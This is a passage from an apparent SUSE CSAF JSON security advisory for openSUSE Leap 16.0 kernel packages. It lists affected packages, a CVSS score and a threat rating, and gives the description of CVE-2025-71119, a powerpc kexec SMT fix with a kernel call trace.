"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71118"
},
{
"cve": "CVE-2025-71119",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71119"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/kexec: Enable SMT before waking offline CPUs\n\nIf SMT is disabled or a partial SMT state is enabled, when a new kernel\nimage is loaded for kexec, on reboot the following warning is observed:\n\nkexec: Waking offline cpu 228.\nWARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc\n[snip]\n NIP kexec_prepare_cpus+0x1b0/0x1bc\n LR kexec_prepare_cpus+0x1a0/0x1bc\n Call Trace:\n kexec_prepare_cpus+0x1a0/0x1bc (unreliable)\n default_machine_kexec+0x160/0x19c\n machine_kexec+0x80/0x88\n kernel_kexec+0xd0/0x118\n __do_sys_reboot+0x210/0x2c4\n system_call_exception+0x124/0x320\n system_call_vectored_common+0x15c/0x2ec\n\nThis occurs as add_cpu() fails due to cpu_bootable() returning false for\nCPUs that fail the cpu_smt_thread_allowed() check or non primary\nthreads if SMT is disabled.\n\nFix the issue by enabling SMT and resetting the number of SMT threads to\nthe number of threads per core, before attempting to wake up all present\nCPUs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
